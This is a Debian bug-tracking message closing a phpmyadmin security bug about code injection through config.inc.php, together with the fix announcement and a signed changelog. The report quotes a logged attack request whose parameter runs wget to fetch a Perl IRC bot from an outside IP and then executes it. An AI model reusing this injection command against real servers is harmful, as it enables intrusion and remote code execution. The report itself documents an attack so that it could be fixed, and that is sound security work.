Your message dated Wed, 14 Oct 2009 10:22:16 +0000
with message-id <e1my0zo-0001mn...@ries.debian.org>
and subject line Bug#535044: fixed in phpmyadmin 4:3.2.2.1-1
has caused the Debian Bug report #535044,
regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole
Hi,
After looking at my logs, I did notice a lot of attempts to break in
phpmyadmin through the following kind of url:
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
//phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&;
It seems PHPMyAdmin shipped with Lenny is still vulnerable to this
remote exploit
It is basically an IRC bot
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores)
Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2 1.5.24 Debian configuration management sy
ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii perl 5.10.0-19 Larry Wall's Practical Extraction
ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-mcrypt 5.2.6.dfsg.1-1+lenny3 MCrypt module for php5
ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5
Versions of packages phpmyadmin recommends:
ii apache2 2.2.9-10+lenny3 Apache HTTP Server metapackage
ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n
ii php5-gd 5.2.6.dfsg.1-1+lenny3 GD module for php5
Versions of packages phpmyadmin suggests:
ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries
-- debconf information:
phpmyadmin/setup-username: admin
* phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:3.2.2.1-1
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_3.2.2.1-1.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.diff.gz
phpmyadmin_3.2.2.1-1.dsc
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.dsc
phpmyadmin_3.2.2.1-1_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1_all.deb
phpmyadmin_3.2.2.1.orig.tar.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 535...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Michal Čihař <ni...@debian.org> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Wed, 14 Oct 2009 10:58:28 +0200
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:3.2.2.1-1
Distribution: unstable
Urgency: low
Maintainer: Thijs Kinkhorst <th...@debian.org>
Changed-By: Michal Čihař <ni...@debian.org>
Description:
phpmyadmin - MySQL web administration tool
Closes: 535044 543460
Changes:
phpmyadmin (4:3.2.2.1-1) unstable; urgency=low
.
* New upstream version.
- Fixes XSS (PMASA-2009-6, CVE-2009-3696, CVE-2009-3697).
* Register documentation on doc-base.
* Use mootools from Debian package rather than own copy.
* Allow saving of configuration from setup script only after explicit action
from administrator (Closes: #535044, #543460).
Checksums-Sha1:
043ba4b0a190929ec451ac8ff8faff147b0fa2f3 1230 phpmyadmin_3.2.2.1-1.dsc
80c8e2091347236bfc0f135d3f92753f760e6947 3709036 phpmyadmin_3.2.2.1.orig.tar.gz
0bc06da6192a224c575edd95dddb5071f11db7a4 38175 phpmyadmin_3.2.2.1-1.diff.gz
05eec7a14f3941b2caf7e70f66883c7c3aceaa74 3703786 phpmyadmin_3.2.2.1-1_all.deb
Checksums-Sha256:
24548da5b8ee77e1bef8d0658689969ea825ee0f869435198326ce358047881a 1230
phpmyadmin_3.2.2.1-1.dsc
99957d98e2610d5f77f83db2e025caecae344d590c8f5694412e5f942d6c0768 3709036
phpmyadmin_3.2.2.1.orig.tar.gz
ad0d35e124fb6020d4ea5b1d74923ab1fb2bbc882909502fafcd17b2a23b1240 38175
phpmyadmin_3.2.2.1-1.diff.gz
ead0d01e3061c3989b5ee7d4a944a89d374948e4e30fa7c008de4c4bc67b5936 3703786
phpmyadmin_3.2.2.1-1_all.deb
Files:
77812ffab6319c421d847d9807321933 1230 web extra phpmyadmin_3.2.2.1-1.dsc
42637af1d7d390fb94ae5460b3f84153 3709036 web extra
phpmyadmin_3.2.2.1.orig.tar.gz
728c63f9d79c655715a20d9980767ea0 38175 web extra phpmyadmin_3.2.2.1-1.diff.gz
c0f61d056b8d81b08da0d8aea2468370 3703786 web extra phpmyadmin_3.2.2.1-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkrVkwUACgkQ3DVS6DbnVgQIhQCbBwo7+KDCrihyieNpLnjfQTMo
4dcAnRAvOTwt5xTLRKS0JIjI4B+CRR4s
=Jrvl
-----END PGP SIGNATURE-----
--- End Message ---
